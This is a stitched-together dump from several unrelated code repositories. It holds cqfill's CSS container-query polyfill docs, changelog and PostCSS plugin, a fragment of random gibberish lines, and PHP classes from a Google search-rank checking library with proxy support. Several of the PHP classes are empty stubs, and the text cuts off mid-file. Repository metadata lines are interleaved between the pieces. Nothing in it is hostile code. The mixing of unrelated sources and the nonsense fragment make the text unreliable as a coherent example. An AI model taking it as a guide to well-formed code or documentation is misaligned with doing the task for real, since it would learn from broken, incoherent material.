<script>cqfill() /* cqfill(document); cqfill(shadowRoot) */</script>
```
```js
import { cqfill } from 'cqfill'
cqfill() /* cqfill(document); cqfill(shadowRoot) */
```
## Usage with PostCSS
Use the included PostCSS plugin to process your CSS:
```js
import postcss from 'postcss'
import postcssCQFill from 'cqfill/postcss'
postcss([ postcssCQFill ])
```
To transform CSS with PostCSS and without any other tooling:
```js
import fs from 'fs'
import postcss from 'postcss'
import postcssCQFill from 'cqfill/postcss'
const from = './test/readme.css'
const fromCss = fs.readFileSync(from, 'utf8')
const to = './test/readme.polyfilled.css'
postcss([ postcssCQFill ]).process(fromCss, { from, to }).then(
({ css }) => fs.writeFileSync(to, css)
)
```
## Usage without PostCSS
Add a fallback property to support the CSS [`contain`] property.
```css
/* before */
.container {
contain: layout inline-size;
}
/* after */
.container {
--css-contain: layout inline-size;
contain: layout inline-size;
}
```
Duplicate container queries using a fallback rule.
```css
/* before */
@container (min-width: 700px) {
.contained {
/* styles applied when a container is at least 700px */
}
}
/* after */
@media --css-container and (min-width: 700px) {
.contained {
/* styles applied when a container is at least 700px */
}
}
@container (min-width: 700px) {
.contained {
/* styles applied when a container is at least 700px */
}
}
```
[`contain`]: https://developer.mozilla.org/en-US/docs/Web/CSS/contain
[CSS Container Queries]: https://css.oddbird.net/rwd/query/explainer/
[PostCSS]: https://github.com/postcss/postcss
[PostCSS Nesting]: https://github.com/csstools/postcss-nesting
<file_sep>/CHANGELOG.md
# Changes to CQFill
### 0.6.0 (May 3, 2021)
- Adds support for automatic polyfilling.
- Fixes an issue where container values were case-sensitive.
- Fixes an issue where container queries worked on axes not allowed by `contain`.
- Reduces how often the CSSOM is updated.
### 0.5.0 (April 28, 2021)
- Adds support for non-px query values — `(width >= 25em)`.
- Adds support for external stylesheets from the same origin.
### 0.4.0 (April 26, 2021)
- Adds PostCSS support for the range syntax — `(width >= 700px)`.
### 0.3.1 (April 26, 2021)
- Adds an `"export"` in `package.json` for `"./postcss-7"`.
### 0.3.0 (April 26, 2021)
- Changes the PostCSS plugin to be the default export.
- Adds a PostCSS 7 version of the plugin for increased tooling compatibility.
### 0.2.1 (April 26, 2021)
- Fixes PostCSS usage instructions.
### 0.2.0 (April 26, 2021)
- Adds a PostCSS plugin.
- Prevent script from throwing in non-DOM environments.
### 0.1.1 (April 25, 2021)
- Fixes the IIFE export.
### 0.1.0 (April 25, 2021)
Initial beta.
<file_sep>/src/polyfill.js
import { cqfill } from './export'
cqfill()
<file_sep>/src/postcss.js
import { transformRanges } from './lib/transformRanges'
function postcssCQFill() {
return {
postcssPlugin: 'PostCSS CQFill',
Declaration: {
contain(
/** @type {PostCSSDeclaration} */
cssDeclaration
) {
cssDeclaration.cloneBefore({
prop: '--css-contain'
})
}
},
AtRule: {
container(
/** @type {PostCSSAtRule} */
cssAtRule
) {
cssAtRule.params = transformRanges(cssAtRule.params)
const clone = cssAtRule.cloneBefore({
name: 'media',
params: `\\@container ${cssAtRule.params}`
})
if (!clone.raws.afterName) clone.raws.afterName = ' '
}
}
}
}
postcssCQFill.postcss = true
export default postcssCQFill
/** @typedef {{ name: string, params: string, cloneBefore(opts: Partial<PostCSSAtRule>): PostCSSAtRule }} PostCSSAtRule */
/** @typedef {{ prop: string, cloneBefore(opts: Partial<PostCSSDeclaration>): PostCSSDeclaration }} PostCSSDeclaration */
|
c2ca57f4e7e8f3d705f68114cc3aee03e4accddc
|
[
"JavaScript",
"Markdown"
] | 8
|
JavaScript
|
teosbb/cqfill
|
7fd175ad52ae19dd95af7da3baffdcbabbb30f70
|
c79fe5fcd570f9b71afc1b10a498b7b8da2ae411
|
refs/heads/master
|
<file_sep>
jvbbh
bkjc
bkjk
fkjlv
kbfkjfbdfkjndknkjdngkjbnbbnngjb n jlfbg
nzgvzhz
njlz
mlz
1234
345
456
gg5
9
0
0
|
5625f2afcd0a95300ec53910c7880e0262cc61ea
|
[
"Python"
] | 1
|
Python
|
matx17/merge
|
9f2ac275c9e3e5061dad6155dcb52f7aaf989737
|
4a2d54cdd20451cc9a002e59b7d52a525c1410e1
|
refs/heads/master
|
<file_sep>export const asArray = ({ benches }) => (
Object.keys(benches).map(key => benches[key])
);<file_sep>class Api::BenchesController < ApplicationController
def index
@benches = bounds ? Bench.in_bounds(bounds) : Bench.all
render :index
end
def create
@bench = Bench.create(bench_params)
render :show
end
private
def bench_params
params.require(:bench).permit(:description, :lat, :lng)
end
def bounds
params[:bounds]
end
end
<file_sep>export const APIUtil = {
signup: user => (
$.ajax({
method: "POST",
url: `/api/users`,
data: { user }
})
),
login: user => (
$.ajax({
method: "POST",
url: '/api/session',
data: { user }
})
),
logout: () => (
$.ajax({
method: "DELETE",
url: `/api/session`
})
)
}<file_sep>import React from "react";
import { Link } from "react-router-dom";
const Greeting = ({ currentUser, logout }) => {
const sessionLinks = () => {
return (
<div className="greeting-links">
<Link className="btn" to="/login">Login</Link>
<Link className="btn" to="/signup">Sign-up</Link>
</div>
)
}
const currentUserGreeting = () => {
return (
<div className="greeting-welcome">
<h3>Welcome {currentUser.username}!</h3>
<a href="/" className="btn" onClick={logout}>Sign out</a>
</div>
)
}
return currentUser ? currentUserGreeting() : sessionLinks()
}
export default Greeting; <file_sep>export const BenchUtil = {
fetchBenches: () => (
$.ajax({
method: "GET",
url: `api/benches`,
error: error => console.log(error)
})
)
}<file_sep>import React from "react";
import BenchMap from "./bench_map";
import BenchIndex from "./bench_index";
export const Search = (props) => (
<section className="section-main">
<BenchMap benches={props.benches}/>
<BenchIndex
benches={props.benches}
fetchBenches={props.fetchBenches} />
</section>
);
|
7f0079a6dfdfc1fe55975cc832c9946b7e98738f
|
[
"JavaScript",
"Ruby"
] | 6
|
JavaScript
|
akhatchatrian/Bench-BnB
|
dfb5b92182e7e74f47b8dd33d6082e2663c80bd8
|
a3cfdd3f0f15fbae0fe9825172b26aec628ae175
|
refs/heads/master
|
<file_sep>"# BlogSpot"
<file_sep>package com.rashmi.rrp.blogspot;
import android.content.Intent;
import android.support.annotation.NonNull;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.text.TextUtils;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ProgressBar;
import android.widget.Toast;
import com.google.android.gms.tasks.OnCompleteListener;
import com.google.android.gms.tasks.Task;
import com.google.firebase.auth.AuthResult;
import com.google.firebase.auth.FirebaseAuth;
import com.google.firebase.auth.FirebaseUser;
public class RegisterActivity extends AppCompatActivity {
private EditText regEmail, regPass, regConfirmPass;
private Button regBtn, regLoginBtn;
private ProgressBar regProgress;
FirebaseAuth mAuth;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_register);
mAuth = FirebaseAuth.getInstance();
regEmail = findViewById(R.id.regEmail);
regPass = findViewById(R.id.regPassword);
regConfirmPass = findViewById(R.id.regConfirmPassword);
regBtn = findViewById(R.id.regBtn);
regLoginBtn = findViewById(R.id.regLoginBtn);
regProgress = findViewById(R.id.regProgressBar);
regLoginBtn.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
finish();
}
});
regBtn.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
String email = regEmail.getText().toString();
String pass = regPass.getText().toString();
String confirmPass = regConfirmPass.getText().toString();
if(!TextUtils.isEmpty(email) && !TextUtils.isEmpty(pass) && !TextUtils.isEmpty(confirmPass)) {
if(pass.equals(confirmPass)) {
regProgress.setVisibility(View.VISIBLE);
mAuth.createUserWithEmailAndPassword(email,pass).addOnCompleteListener(new OnCompleteListener<AuthResult>() {
@Override
public void onComplete(@NonNull Task<AuthResult> task) {
if(task.isSuccessful()) {
Intent setupIntent = new Intent(RegisterActivity.this, setupActivity.class);
startActivity(setupIntent);
finish();
} else {
String errorMessage = task.getException().getMessage();
Toast.makeText(RegisterActivity.this, "Error : " +errorMessage, Toast.LENGTH_LONG).show();
}
regProgress.setVisibility(View.INVISIBLE);
}
});
} else {
Toast.makeText(RegisterActivity.this, "Confirm password and password doesn't match", Toast.LENGTH_LONG).show();
}
} else {
Toast.makeText(RegisterActivity.this, "Fill up...", Toast.LENGTH_LONG).show();
}
}
});
}
@Override
protected void onStart() {
super.onStart();
FirebaseUser currentUser = mAuth.getCurrentUser();
if (currentUser != null) {
sendToMain();
}
}
private void sendToMain() {
Intent mainIntent = new Intent(RegisterActivity.this, MainActivity.class);
startActivity(mainIntent);
finish();
}
}
<file_sep>package com.rashmi.rrp.blogspot;
import android.content.Context;
import android.support.annotation.NonNull;
import android.support.v7.widget.RecyclerView;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import com.bumptech.glide.Glide;
import com.bumptech.glide.request.RequestOptions;
import com.google.android.gms.tasks.OnCompleteListener;
import com.google.android.gms.tasks.Task;
import com.google.firebase.auth.FirebaseAuth;
import com.google.firebase.firestore.DocumentSnapshot;
import com.google.firebase.firestore.EventListener;
import com.google.firebase.firestore.FirebaseFirestore;
import com.google.firebase.firestore.FirebaseFirestoreException;
import com.google.firebase.firestore.QuerySnapshot;
import java.util.List;
import javax.annotation.Nullable;
import de.hdodenhof.circleimageview.CircleImageView;
public class CommentsRecyclerAdapter extends RecyclerView.Adapter<CommentsRecyclerAdapter.ViewHolder> {
public List<Comments> commentsList;
public Context context;
public FirebaseFirestore firebaseFirestore;
public CommentsRecyclerAdapter(List<Comments> commentsList) {
this.commentsList = commentsList;
}
@NonNull
@Override
public ViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
View view = LayoutInflater.from(parent.getContext()).inflate(R.layout.comment_list_item, parent, false);
context = parent.getContext();
firebaseFirestore = FirebaseFirestore.getInstance();
return new CommentsRecyclerAdapter.ViewHolder(view);
}
@Override
public void onBindViewHolder(@NonNull final ViewHolder holder, int position) {
holder.setIsRecyclable(false);
String commentMessage = commentsList.get(position).getMessage();
holder.setCommentMessage(commentMessage);
String userId = commentsList.get(position).getUserId();
firebaseFirestore.collection("Users").document(userId).get().addOnCompleteListener(new OnCompleteListener<DocumentSnapshot>() {
@Override
public void onComplete(@NonNull Task<DocumentSnapshot> task) {
if (task.isSuccessful()) {
String userName = task.getResult().getString("name");
String userImage = task.getResult().getString("image");
holder.setUserData(userName, userImage);
} else {
task.getException();
}
}
});
}
@Override
public int getItemCount() {
if (commentsList != null) {
return commentsList.size();
} else {
return 0;
}
}
public class ViewHolder extends RecyclerView.ViewHolder {
private View mView;
private TextView commentMessage;
private CircleImageView commentProfileImage;
private TextView commentUsername;
public ViewHolder(View itemView) {
super(itemView);
mView = itemView;
}
public void setCommentMessage(String message) {
commentMessage = mView.findViewById(R.id.commentMessage);
commentMessage.setText(message);
}
public void setUserData(String userName, String userImage) {
commentProfileImage = mView.findViewById(R.id.commentImage);
commentUsername = mView.findViewById(R.id.commentUsername);
commentUsername.setText(userName);
RequestOptions placeholderOption = new RequestOptions();
placeholderOption.placeholder(R.drawable.avatar);
Glide.with(context).applyDefaultRequestOptions(placeholderOption).load(userImage).into(commentProfileImage);
}
}
}
|
8d078e6f734f0eebcf75ba75b1faab866a1cac8f
|
[
"Markdown",
"Java"
] | 3
|
Markdown
|
Rashmiranjan00/BlogSpot
|
5a58464453ba9bf1c03e5daace9af002b84287d5
|
f96c3077132d32f43ad5e83d105ecf2c4c12cc6a
|
refs/heads/master
|
<file_sep>#!/usr/bin/ruby
require 'net/http'
require 'json'
# A processor used to get information from a Shopify shop.
class StoreProcessor
# Create a URI from String and test it. Either operation could
# throw an exception. If either fails, catch their exception
# and focus them into a InitializationError
def initialize(store_string)
puts "Trying to create URI on \"#{store_string}\""
@product_uri = build_product_uri(store_string)
puts "Testing connectivity to \"#{@product_uri}\"..."
fetch_products(@product_uri)
rescue StandardError => error # Focus the exceptions
raise InitializationError, error.message
end
# Print a list of available types in the store
def print_types
list = list_types
puts 'The available types are:'
puts list
end
# Find the total cost to purchase all items of given types
def get_filtered_total(item_types)
puts "Getting total for item types #{item_types} from \"#{@product_uri}\""
total = 0
products_of_each_page do |products|
filtered_products = filter_products(products, item_types)
print_all_prices(filtered_products)
filtered_variants_prices = all_variant_prices(filtered_products)
total += filtered_variants_prices.reduce(0, :+)
end
# Some extra formatting to make sure we get exactly two decimals
puts "TOTAL: $#{format('%.2f', total)}"
total
end
private
# Build a product URI from a string describing a Shopify store
def build_product_uri(uri_string)
product_uri = URI(uri_string)
product_uri.path = '/products.json'
if product_uri.host.nil?
raise URI::InvalidURIError, "Couldn't create a URI with a valid host!"
end
product_uri
end
# Get a list of products
def fetch_products(product_uri)
response = Net::HTTP.get_response(product_uri)
response.value # Throws an exception if the response code is not 2xx
JSON.parse(response.body)['products']
end
# Get a list of filtered products
def filter_products(products, item_types)
products.select do |product|
item_types.any? do |type|
product['product_type'].downcase.include? type.downcase
end
end
end
# Get a list of prices for each variant of every product from a product list
def all_variant_prices(products)
products.flat_map do |product|
product['variants'].map do |variant|
variant['price'].to_f
end
end
end
# Prints all variants of a product list with their prices
def print_all_prices(products)
products.each do |product|
puts product['title']
product['variants'].each do |variant|
puts " #{variant['title']} -> $#{variant['price']}"
end
end
end
# Run the content of a block and handle errors it may raise
def with_error_handling
yield
rescue StandardError => error
puts "#{__method__}: #{error.message}"
puts "#{__method__} backtrace:"
puts error.backtrace
nil
end
# Go through each store page
def each_page
# We pick a large range of page numbers. This could be done better
# if we were able to determine the number of pages before iterating
(1..9_999_999).each do |page_number|
yield page_number
end
end
# Go through the products of each page
def products_of_each_page
each_page do |page_number|
# Make a copy as URI requires we modify the object to handle
# different queries
page_product_uri = @product_uri.dup
# Build a URI for the page number
page_product_uri.query = URI.encode_www_form(page: page_number)
products = with_error_handling do
puts "Checking products on page #{page_number}"
fetch_products(page_product_uri)
end
break if products.nil?
break if products.empty?
yield products
end
end
# Gets the types available in the store
def list_types
puts "Getting available shop types from \"#{@product_uri}\""
types = []
products_of_each_page do |products|
types += products.map { |product| product['product_type'] }
end
types.uniq
end
end
# An error used during initialization
class InitializationError < StandardError; end
<file_sep>#!/usr/bin/ruby
# Quick script to run our StoreProcessor in a CLI util!
require 'optparse'
require 'ostruct'
require_relative 'StoreProcessor'
# Help if run without options
ARGV << '-h' if ARGV.empty?
options = OpenStruct.new
options.types = Array.new
OptionParser.new do |opts|
opts.banner =
"This is a small util used to get info on Shopify stores. \n" +
"With this, you can: \n" +
" 1. Get a list of the various types of items of a store. \n" +
" e.g. #{File.basename(__FILE__)} --store 'http://shopicruit.myshopify.com' \n" +
" 2. Search a store for all items of given types! \n" +
" e.g. #{File.basename(__FILE__)} --store 'http://shopicruit.myshopify.com' --types 'watch,clock'"
opts.separator ""
opts.separator "Usage: #{File.basename(__FILE__)} [options]"
opts.separator ""
opts.separator "Specific options:"
opts.on("-s", "--store STORE_URI", String, "URI to a Shopify store. Be sure to include the protocol!") do |store_uri|
options.store_uri = store_uri
end
opts.on("-t", "--types x,y,z", Array, "Comma separated list of item types.") do |types|
options.types.push(*types)
end
opts.on("-f", "--type TYPE", String, "An item type. This option can be used many times.") do |type|
options.types.push(type)
end
opts.on_tail("-h", "--help", "This message.") do
puts opts
exit
end
end.parse!
def carefully
yield
rescue StandardError => error
puts
puts "Error message: #{error.message}"
puts "Error backtrace:"
puts error.backtrace
puts
puts"Couldn't complete task! :("
end
if options.store_uri.nil?
puts "Error! You need to provide a store URI! Use -h for help!"
exit
end
carefully do
processor = StoreProcessor.new(options.store_uri)
if options.types.empty?
processor.print_types
else
processor.get_filtered_total(options.types)
end
end
<file_sep># shopify-store-util
This is a small util used to get info on Shopify stores.
With this, you can:
1. Get a list of the various types of items of a store.
e.g. shopify-store-util.rb --store 'http://shopicruit.myshopify.com'
2. Search a store for all items of given types!
e.g. shopify-store-util.rb --store 'http://shopicruit.myshopify.com' --types 'watch,clock'
<file_sep>#!/usr/bin/ruby
require_relative 'StoreProcessor'
def with_error_printing
yield
rescue StandardError => error
puts "#{__method__}: #{error.message}"
puts "#{__method__} backtrace:"
puts error.backtrace
nil
end
with_error_printing do
StoreProcessor.new('http://shopicruit.myshopify.com/')
.get_filtered_total(%w(clocK wAtch))
end
with_error_printing do
StoreProcessor.new('http://google.com')
.get_filtered_total(%w(clocK wAtch))
end
# TODO: Split these into tests
# begin
# processor = StoreProcessor.new("nonsense")
# rescue ArgumentError
# p "Caught error!"
# end
#
# Types = [ "clock" ]
# processor.get_filtered_total(Types); puts
# processor.get_filtered_total([]); puts
# processor.get_filtered_total(['Elephants']); puts
# processor.get_filtered_total([ 'clock', 'watch' ]); puts
|
1ba9abd2ad98db96091943bed8aca68ad7c39895
|
[
"Markdown",
"Ruby"
] | 4
|
Ruby
|
froyomuffin/shopify-store-util
|
07a62aa581f790779d2fbbe3589c2ff93ae5fea3
|
ab5cabf709e54d0749bf5644c5810418c8597fbd
|
refs/heads/master
|
<repo_name>rimriahi14/render-props-examples<file_sep>/src/List.js
import React, { Component } from 'react';
class List extends Component {
render() {
const { render, children } = this.props;
return (
<>
{render && render({
users: [{ name: 'elin' }, { name: 'riahi' }]
})}
{children}
</>
)
}
}
export default List;<file_sep>/README.old.md
# render-props-examples
|
e0417cfb3242cf615dffb7f133174705e4861325
|
[
"JavaScript",
"Markdown"
] | 2
|
JavaScript
|
rimriahi14/render-props-examples
|
470743a1380eca6cd7f65b0127bccd1d576da42b
|
d54ee8f86517dbebd6ab242ba464b8afe8b537ec
|
refs/heads/master
|
<repo_name>marlemiesz/google-search-results<file_sep>/src/Response/Response.php
<?php
namespace Marlemiesz\GoogleSearchResult\Response;
class Response implements ResponseInterface
{
private ?int $rank;
private ?string $error_message;
/**
* Response constructor.
*/
public function __construct()
{
}
/**
* @return string|null
*/
public function getErrorMessage(): ?string
{
return $this->error_message;
}
/**
* @return int
*/
public function getRank(): ?int
{
return $this->rank;
}
public function setRank(?int $rank, ?string $message = null): void
{
if ($this->isRankCorrect($rank) && $message === null) {
$this->rank = $rank;
} else {
$this->rank = null;
$this->error_message = $message ?? 'Unable to get rank. Unknown Reason.';
}
}
private function isRankCorrect(?int $rank):bool
{
return
$rank !== null &&
$rank <= 100
;
}
}
<file_sep>/src/Proxy/ProxyInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\Proxy;
interface ProxyInterface
{
/**
* @return string
*/
public function getIp(): string;
/**
* @param string $ip
*/
public function setIp(string $ip): void;
/**
* @return string
*/
public function getPort(): string;
/**
* @param string $port
*/
public function setPort(string $port): void;
/**
* @return string
*/
public function getProtocol(): string;
/**
* @param string $protocol
*/
public function setProtocol(string $protocol): void;
public function getUrl(): string;
}
<file_sep>/tests/Request/RequestTest.php
<?php
namespace Marlemiesz\GoogleSearchResult\Tests\Request;
use Marlemiesz\GoogleSearchResult\Constants\GoogleDomain;
use Marlemiesz\GoogleSearchResult\Proxy\Proxy;
use Marlemiesz\GoogleSearchResult\Request\Request;
use Marlemiesz\GoogleSearchResult\Request\RequestInterface;
use Marlemiesz\GoogleSearchResult\Response\Response;
use PHPUnit\Framework\TestCase;
class RequestTest extends TestCase
{
public function testInterface()
{
$proxy = new Proxy('8.8.8.8', '8081', 'sock5');
$request = new Request('google.pl', new Response(), GoogleDomain::googlepl, $proxy, 'Warsaw');
$this->assertInstanceOf(RequestInterface::class, $request, "Request is not instance of RequestInterface");
}
public function testRequestResponse()
{
$request = new Request('world', new Response());
$request->setResponse(4);
$this->assertEquals(4, $request->getResponseRank());
$request->setResponse(101);
$this->assertEquals(null, $request->getResponseRank());
$this->assertIsString($request->getResponseError());
$error_message = 'Unable to find rank';
$request->setResponse(null, $error_message);
$this->assertEquals(null, $request->getResponseRank());
$this->assertEquals($error_message, $request->getResponseError());
}
}
<file_sep>/src/Response/ResponseInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\Response;
interface ResponseInterface
{
/**
* @return int
*/
public function getRank(): ?int;
/**
* @return string|null
*/
public function getErrorMessage(): ?string;
/**
* @param int $rank
* @param string|null $message
*/
public function setRank(?int $rank, ?string $message = null): void;
}
<file_sep>/src/RequestService/ServiceInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\RequestService;
use Marlemiesz\GoogleSearchResult\Parser\ParserInterface;
use Marlemiesz\GoogleSearchResult\Request\RequestInterface;
interface ServiceInterface
{
/**
* @param RequestInterface ...$request
* @param ParserInterface $parser
* @return array
*/
public function execute(ParserInterface $parser, RequestInterface ...$request): array;
}
<file_sep>/src/Constants/GoogleDomain.php
<?php
namespace Marlemiesz\GoogleSearchResult\Constants;
class GoogleDomain
{
const googlead = "google.ad";
const googleae = "google.ae";
const googlecomaf = "google.com.af";
const googlecomag = "google.com.ag";
const googlecomai = "google.com.ai";
const googleal = "google.al";
const googleam = "google.am";
const googlecoao = "google.co.ao";
const googlecomar = "google.com.ar";
const googleas = "google.as";
const googleat = "google.at";
const googlecomau = "google.com.au";
const googleaz = "google.az";
const googleba = "google.ba";
const googlecombd = "google.com.bd";
const googlebe = "google.be";
const googlebf = "google.bf";
const googlebg = "google.bg";
const googlecombh = "google.com.bh";
const googlebi = "google.bi";
const googlebj = "google.bj";
const googlecombn = "google.com.bn";
const googlecombo = "google.com.bo";
const googlecombr = "google.com.br";
const googlebs = "google.bs";
const googlebt = "google.bt";
const googlecobw = "google.co.bw";
const googleby = "google.by";
const googlecombz = "google.com.bz";
const googleca = "google.ca";
const googlecd = "google.cd";
const googlecf = "google.cf";
const googlecg = "google.cg";
const googlech = "google.ch";
const googleci = "google.ci";
const googlecock = "google.co.ck";
const googlecl = "google.cl";
const googlecm = "google.cm";
const googlecn = "google.cn";
const googlecomco = "google.com.co";
const googlecocr = "google.co.cr";
const googlecomcu = "google.com.cu";
const googlecv = "google.cv";
const googlecomcy = "google.com.cy";
const googlecz = "google.cz";
const googlede = "google.de";
const googledj = "google.dj";
const googledk = "google.dk";
const googledm = "google.dm";
const googlecomdo = "google.com.do";
const googledz = "google.dz";
const googlecomec = "google.com.ec";
const googleee = "google.ee";
const googlecomeg = "google.com.eg";
const googlees = "google.es";
const googlecomet = "google.com.et";
const googlefi = "google.fi";
const googlecomfj = "google.com.fj";
const googlefm = "google.fm";
const googlefr = "google.fr";
const googlega = "google.ga";
const googlege = "google.ge";
const googlegg = "google.gg";
const googlecomgh = "google.com.gh";
const googlecomgi = "google.com.gi";
const googlegl = "google.gl";
const googlegm = "google.gm";
const googlegr = "google.gr";
const googlecomgt = "google.com.gt";
const googlegy = "google.gy";
const googlecomhk = "google.com.hk";
const googlehn = "google.hn";
const googlehr = "google.hr";
const googleht = "google.ht";
const googlehu = "google.hu";
const googlecoid = "google.co.id";
const googleie = "google.ie";
const googlecoil = "google.co.il";
const googleim = "google.im";
const googlecoin = "google.co.in";
const googleiq = "google.iq";
const googleis = "google.is";
const googleit = "google.it";
const googleje = "google.je";
const googlecomjm = "google.com.jm";
const googlejo = "google.jo";
const googlecojp = "google.co.jp";
const googlecoke = "google.co.ke";
const googlecomkh = "google.com.kh";
const googleki = "google.ki";
const googlekg = "google.kg";
const googlecokr = "google.co.kr";
const googlecomkw = "google.com.kw";
const googlekz = "google.kz";
const googlela = "google.la";
const googlecomlb = "google.com.lb";
const googleli = "google.li";
const googlelk = "google.lk";
const googlecols = "google.co.ls";
const googlelt = "google.lt";
const googlelu = "google.lu";
const googlelv = "google.lv";
const googlecomly = "google.com.ly";
const googlecoma = "google.co.ma";
const googlemd = "google.md";
const googleme = "google.me";
const googlemg = "google.mg";
const googlemk = "google.mk";
const googleml = "google.ml";
const googlecommm = "google.com.mm";
const googlemn = "google.mn";
const googlems = "google.ms";
const googlecommt = "google.com.mt";
const googlemu = "google.mu";
const googlemv = "google.mv";
const googlemw = "google.mw";
const googlecommx = "google.com.mx";
const googlecommy = "google.com.my";
const googlecomz = "google.co.mz";
const googlecomna = "google.com.na";
const googlecomng = "google.com.ng";
const googlecomni = "google.com.ni";
const googlene = "google.ne";
const googlenl = "google.nl";
const googleno = "google.no";
const googlecomnp = "google.com.np";
const googlenr = "google.nr";
const googlenu = "google.nu";
const googleconz = "google.co.nz";
const googlecomom = "google.com.om";
const googlecompa = "google.com.pa";
const googlecompe = "google.com.pe";
const googlecompg = "google.com.pg";
const googlecomph = "google.com.ph";
const googlecompk = "google.com.pk";
const googlepl = "google.pl";
const googlepn = "google.pn";
const googlecompr = "google.com.pr";
const googleps = "google.ps";
const googlept = "google.pt";
const googlecompy = "google.com.py";
const googlecomqa = "google.com.qa";
const googlero = "google.ro";
const googleru = "google.ru";
const googlerw = "google.rw";
const googlecomsa = "google.com.sa";
const googlecomsb = "google.com.sb";
const googlesc = "google.sc";
const googlese = "google.se";
const googlecomsg = "google.com.sg";
const googlesh = "google.sh";
const googlesi = "google.si";
const googlesk = "google.sk";
const googlecomsl = "google.com.sl";
const googlesn = "google.sn";
const googleso = "google.so";
const googlesm = "google.sm";
const googlesr = "google.sr";
const googlest = "google.st";
const googlecomsv = "google.com.sv";
const googletd = "google.td";
const googletg = "google.tg";
const googlecoth = "google.co.th";
const googlecomtj = "google.com.tj";
const googletl = "google.tl";
const googletm = "google.tm";
const googletn = "google.tn";
const googleto = "google.to";
const googlecomtr = "google.com.tr";
const googlett = "google.tt";
const googlecomtw = "google.com.tw";
const googlecotz = "google.co.tz";
const googlecomua = "google.com.ua";
const googlecoug = "google.co.ug";
const googlecouk = "google.co.uk";
const googlecomuy = "google.com.uy";
const googlecouz = "google.co.uz";
const googlecomvc = "google.com.vc";
const googlecove = "google.co.ve";
const googlevg = "google.vg";
const googlecovi = "google.co.vi";
const googlecomvn = "google.com.vn";
const googlevu = "google.vu";
const googlews = "google.ws";
const googlers = "google.rs";
const googlecoza = "google.co.za";
const googlecozm = "google.co.zm";
const googlecozw = "google.co.zw";
const googlecat = "google.cat";
}
<file_sep>/src/Parser/ParserInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\Parser;
interface ParserInterface
{
public function parse(string $content);
}
<file_sep>/tests/Request/ProxyTest.php
<?php
namespace Marlemiesz\GoogleSearchResult\Tests\Request;
use Marlemiesz\GoogleSearchResult\Proxy\Proxy;
use Marlemiesz\GoogleSearchResult\Proxy\ProxyInterface;
use PHPUnit\Framework\TestCase;
class ProxyTest extends TestCase
{
public function testGetUrl()
{
$proxy = new Proxy('8.8.8.8', '8081', 'sock5');
$this->assertEquals('sock5://8.8.8.8:8081', $proxy->getUrl(), "Generated url by proxy isn't correct");
$proxy = new Proxy('8.8.8.8', '8081');
$this->assertEquals('tcp://8.8.8.8:8081', $proxy->getUrl(), "Default protocol in proxy is not tcp");
}
public function testInterface()
{
$proxy = new Proxy('8.8.8.8', '8081', 'sock5');
$this->assertInstanceOf(ProxyInterface::class, $proxy, "Proxy is not instance of ProxyInterface");
}
}
<file_sep>/src/Request/RequestInterface.php
<?php
namespace Marlemiesz\GoogleSearchResult\Request;
use Marlemiesz\GoogleSearchResult\Proxy\ProxyInterface;
interface RequestInterface
{
/**
* @return string|null
*/
public function getLocation(): ?string;
/**
* @param string|null $location
*/
public function setLocation(?string $location): void;
/**
* @return string
*/
public function getDomain(): string;
/**
* @param string $domain
*/
public function setDomain(string $domain): void;
/**
* @return string
*/
public function getQuery(): string;
/**
* @param string $query
*/
public function setQuery(string $query): void;
/**
* @return ProxyInterface|null
*/
public function getProxy(): ?ProxyInterface;
/**
* @param ProxyInterface|null $proxy
*/
public function setProxy(?ProxyInterface $proxy): void;
/**
* @param int|null $rank
* @param string|null $error_message
* @return void
*/
public function setResponse(?int $rank, ?string $error_message): void;
/**
* @return int
*/
public function getResponseRank(): ?int;
/**
* @return bool
*/
public function isResponseCorrect(): bool;
/**
* @return string|null
*/
public function getResponseError(): ?string;
}
<file_sep>/src/Parser/HtmlParser.php
<?php
namespace Marlemiesz\GoogleSearchResult\Parser;
class HtmlParser implements ParserInterface
{
public function parse(string $content)
{
}
}
<file_sep>/src/RequestService/AsyncService.php
<?php
namespace Marlemiesz\GoogleSearchResult\RequestService;
use Marlemiesz\GoogleSearchResult\Parser\ParserInterface;
use Marlemiesz\GoogleSearchResult\Request\RequestInterface;
class AsyncService implements ServiceInterface
{
public function execute(ParserInterface $parser, RequestInterface ...$request): array
{
}
}
<file_sep>/src/Proxy/Proxy.php
<?php
namespace Marlemiesz\GoogleSearchResult\Proxy;
class Proxy implements ProxyInterface
{
private string $ip;
private string $port;
private string $protocol;
/**
* Proxy constructor.
* @param string $ip
* @param string $port
* @param string $protocol
*/
public function __construct(string $ip, string $port, string $protocol = 'tcp')
{
$this->ip = $ip;
$this->port = $port;
$this->protocol = $protocol;
}
/**
* @return string
*/
public function getIp(): string
{
return $this->ip;
}
/**
* @param string $ip
*/
public function setIp(string $ip): void
{
$this->ip = $ip;
}
/**
* @return string
*/
public function getPort(): string
{
return $this->port;
}
/**
* @param string $port
*/
public function setPort(string $port): void
{
$this->port = $port;
}
/**
* @return string
*/
public function getProtocol(): string
{
return $this->protocol;
}
/**
* @param string $protocol
*/
public function setProtocol(string $protocol): void
{
$this->protocol = $protocol;
}
public function getUrl(): string
{
return sprintf("%s://%s:%s", $this->getProtocol(), $this->getIp(), $this->getPort());
}
}
<file_sep>/src/Client.php
<?php
namespace Marlemiesz\GoogleSearchResult;
use Marlemiesz\GoogleSearchResult\Request\RequestInterface;
class Client
{
/**
* @var RequestInterface[]
*/
protected array $requests = [];
/**
* Client constructor.
* @param RequestInterface ...$requests
*/
public function __construct()
{
}
/**
* @param RequestInterface ...$requests
*/
public function addRequests(RequestInterface ...$requests)
{
$this->requests += $requests;
}
/**
* @param RequestInterface $request
*/
public function addRequest(RequestInterface $request)
{
$this->requests[] = $request;
}
public function execute(): void
{
}
}
<file_sep>/src/Request/Request.php
<?php
namespace Marlemiesz\GoogleSearchResult\Request;
